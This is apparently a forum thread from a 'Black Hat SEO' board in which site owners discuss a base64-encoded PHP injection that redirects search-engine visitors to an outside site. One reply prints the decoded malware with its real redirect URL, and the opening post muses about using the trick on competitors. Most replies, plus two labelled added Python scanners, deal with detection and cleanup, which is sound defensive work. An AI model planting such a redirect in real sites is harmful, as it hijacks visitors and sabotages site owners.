
A malware injection that makes your site/competitor's site lose its ranking on big G

Discussion in 'Black Hat SEO' started by Raven13, Sep 14, 2011.

  1. Raven13

    Raven13 Power Member

    Joined:
    May 31, 2011
    Messages:
    635
    Likes Received:
    402
    Occupation:
    Online Business coaching & Consulting.
    Location:
    Location independent (Now: Rio de Janeiro)
    Hello guys,

    Recently I've faced this problem on one of my sites built with Joomla, so I want to share this with the community as it's related to SEO. Somebody injected this code into all my PHP pages:
    It's coded with base64!

    All my keywords that were ranking in the top 5 have gone to the 5th page!!! And when somebody types a keyword related to my niche and clicks on the result on Google, he's automatically redirected to this page:

    I really don't know how they managed to inject this into my site... Does anyone here know what I can do to avoid this in the future?
    And how can we do this?
    It's a great silent weapon: you can't know that your site is infected. Your site drops in the SERP and you can't know it until you click on the result on Google to see the catastrophe!!!


    PS: Sorry for my bad English.
     
  2. jcbizzled

    jcbizzled Registered Member

    Joined:
    Aug 23, 2010
    Messages:
    50
    Likes Received:
    12
    Hi,

    I've run into this sort of thing before on Wordpress sites, but knowing how it happened is difficult. Usually it is a result of a poorly written (vulnerable) plugin or theme implementation. A quick fix you could do to prevent it while you investigate further is to remove the write bit on your files to prevent your apache/webserver/etc processes from being able to make any changes to anything.

    This is what the decoded code is running. As you noted, it basically looks like they're just redirecting your traffic if the referrer is from yahoo, google, msn, ... so they're effectively stealing your traffic and probably your seo juice as well.

    Code:
    
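    error_reporting(0);                 // hide PHP errors so the injection stays silent
    $nccv=headers_sent();
    if (!$nccv){                        // a redirect is only possible before any output is sent
    $referer=$_SERVER['HTTP_REFERER'];
    $ua=$_SERVER['HTTP_USER_AGENT'];    // read but never used in this snippet
    // act only on visitors arriving from a search engine result
    if (stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")) {
    	// because of "or", this is true unless the referer contains both "cache" and "inurl"
    	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
    		header("Location: http://www.liaekim.com.br/site/includes/js/wz_uye.html");
    		exit();
    	}
    }
    }                                   // closes if (!$nccv); this brace was missing from the paste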
    
     
    Last edited: Sep 14, 2011
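
For anyone cleaning up after this kind of injection, here is an added example (not code from any poster in this thread) that finds base64-wrapped injections in a site tree, decodes them without executing them, and reports whether the payload has the referer-gated redirect shape decoded above. The `eval(base64_decode("..."))` wrapper form is an assumption, since the raw injected line is not shown in the thread; `inspect_source`, `scan_tree` and the sample are constructed for illustration.

```python
import base64
import os
import re

# Assumed wrapper shape; the thread never shows the raw injected line.
WRAPPER = re.compile(
    r"""eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)""")
REFERER = re.compile(r"HTTP_REFERER", re.I)
ENGINES = re.compile(r"google|yahoo|bing|ask\.com|msn|live", re.I)
REDIRECT = re.compile(r"""header\s*\(\s*["']Location:\s*([^"']+)""", re.I)


def inspect_source(text):
    """Decode every wrapper in text (never executing it) and describe it."""
    findings = []
    for m in WRAPPER.finditer(text):
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:
            decoded = ""  # malformed blob: still reported, nothing to analyse
        target = REDIRECT.search(decoded)
        findings.append({
            "line": text.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "referer_gated": bool(REFERER.search(decoded) and ENGINES.search(decoded)),
            "redirect_to": target.group(1).strip() if target else None,
        })
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html")):
    """Map each file under root that contains a wrapper to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = inspect_source(fh.read())
                if found:
                    hits[path] = found
    return hits


# Constructed sample: an injected first line ahead of the real page.
PAYLOAD = ('$r=$_SERVER["HTTP_REFERER"];if (stristr($r,"google")) {'
           'header("Location: http://redirect.example.invalid/x.html");exit();}')
SAMPLE_PHP = ('<?php eval(base64_decode("%s")); ?>\n<?php echo "real page"; ?>\n'
              % base64.b64encode(PAYLOAD.encode()).decode())
```

Run `scan_tree` against a copy of the web root; a finding with `referer_gated` set and a foreign `redirect_to` matches the behaviour described in this thread, while legitimate packed scripts will show up with both fields empty.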
  3. Raven13

    Raven13 Power Member

    Thanks for your reply dude!
    And what exactly do you suggest I do to avoid this kind of injection in the future, please? I already removed everything from all the infected files with Notepad++. Should I change the CHMOD on those files? Should I add something? Help will be really appreciated :)
     
  4. sheiky

    sheiky Newbie

    Joined:
    Jun 6, 2011
    Messages:
    4
    Likes Received:
    0
    Home Page:
    I too got attacked with the "Eval" code recently. I installed WP security scan and antivirus plugins to check, and fixed a few things, given below:

    Even though the code resided inside the .js files of a couple of plugins and functions.php inside my theme files.

    I found the Eval code inside the plugins and removed the entire plugin directory:

    sexylightbox.v2.1.mootools.min.js file inside wp-emailfeedburnerpopup plugin folder got infected (Sexy LightBox wordpress plugin)

    jquery.MultiFile.pack.js file inside nextgen-gallery/admin got infected

    Also found the script inside current theme/functions.php and removed it.

    Now everything is working fine. It's better to have WP security scan and antivirus plugins to monitor the site.

    Thanks for your advice...:)
     
  5. sniper272

    sniper272 Regular Member

    Joined:
    Sep 18, 2008
    Messages:
    397
    Likes Received:
    77
    Had the same thing happen to all three of my sites. It's from malware on the PC; I got it from LimeWire. All of my sites moved back to the #2, #3 and #2 spots after I removed it from like 15 different pages on each site and then logged into Google Webmasters to inform them that I had removed them. Then a bot will automatically check your site to see if it has all been removed.
     
  6. Raven13

    Raven13 Power Member

    Have you got the same problem? Redirecting to the same site?
     
  7. sandrine10

    sandrine10 Power Member

    Joined:
    Apr 14, 2010
    Messages:
    621
    Likes Received:
    63
    Location:
    CyberLand
    Hey Raven13, have you solved the problem? If yes, please tell us how. Who knows, we may face the same issue.
     
  8. scriptomania

    scriptomania Junior Member

    Joined:
    Dec 28, 2010
    Messages:
    127
    Likes Received:
    249
    Occupation:
    A full time pirate at sea
    Location:
    The European capital of politics
    Lesson: don't download nulled themes/scripts kids. /jk
     
  9. bytzu

    bytzu Registered Member

    Joined:
    Jun 30, 2011
    Messages:
    96
    Likes Received:
    138
    Try searching on 'exploit database' (google it, I cannot post links yet) for, for example, the list of components or plugins you are using for your websites. Usually it gets listed there when a new exploit for a Joomla / WordPress component or plugin is found. Try to update to the latest version.
     
  10. Corydoras007

    Corydoras007 Regular Member

    Joined:
    Sep 17, 2012
    Messages:
    303
    Likes Received:
    53
    jcbizzled,

    Just curious but what did you use to decode the code?

    Thanks.

    Nevermind... for those who have similar questions, check this site out to decode such codes

    perishablepress dot com/tools/decoder/index.php
     
    Last edited: Nov 14, 2012
  11. timgraham

    timgraham Newbie

    Joined:
    Nov 11, 2012
    Messages:
    48
    Likes Received:
    4
    Check your .htaccess file also. I got injected and it kept writing redirects in the .htaccess file.
    The redirect script would check the referrer against around 10 of the biggest sites like Google, Facebook etc. and if it was one of those, it would redirect to a malware site in Russia.
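
The .htaccess check suggested above can be automated. This is an added example, not code from any poster: it flags a `RewriteRule` that sends visitors to another host when it is guarded by `RewriteCond %{HTTP_REFERER}` lines naming big referrer sites. The site list, the function name `audit_htaccess` and the sample file are assumptions constructed for illustration.

```python
import re

# Assumed referrer names; the post only says "around 10 of the biggest sites".
ENGINES = ("google", "yahoo", "bing", "msn", "ask", "live", "facebook")
REF_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
ANY_COND = re.compile(r"^\s*RewriteCond\b", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)


def audit_htaccess(text, own_hosts=()):
    """Return (line_number, target, referrers) for each referrer-gated
    RewriteRule whose target is an absolute URL on a host not in own_hosts."""
    findings, pending = [], []
    for no, line in enumerate(text.splitlines(), 1):
        cond = REF_COND.match(line)
        if cond:
            pattern = cond.group(1).lower()
            pending += [e for e in ENGINES if e in pattern and e not in pending]
            continue
        if ANY_COND.match(line):
            continue  # other conditions attach to the same upcoming rule
        rule = RULE.match(line)
        if rule:
            target = rule.group(2)
            host = re.match(r"https?://([^/:]+)", target, re.I)
            external = host and host.group(1).lower() not in own_hosts
            if pending and external:
                findings.append((no, target, sorted(pending)))
            pending = []  # conditions only apply to the next RewriteRule
    return findings


# Constructed sample: one legitimate canonical-host rule, one injected block.
SAMPLE = r"""RewriteEngine On
# legitimate rule: force canonical host
RewriteCond %{HTTP_HOST} !^www\.shop\.example$ [NC]
RewriteRule ^(.*)$ http://www.shop.example/$1 [R=301,L]
# injected block (constructed)
RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.* [NC]
RewriteRule ^(.*)$ http://redirect.example.invalid/in.php [R=302,L]
"""
```

Since the post describes the redirects being written back repeatedly, a clean audit result right after cleanup is worth re-checking later, for example from a scheduled job that compares the file against a known-good copy.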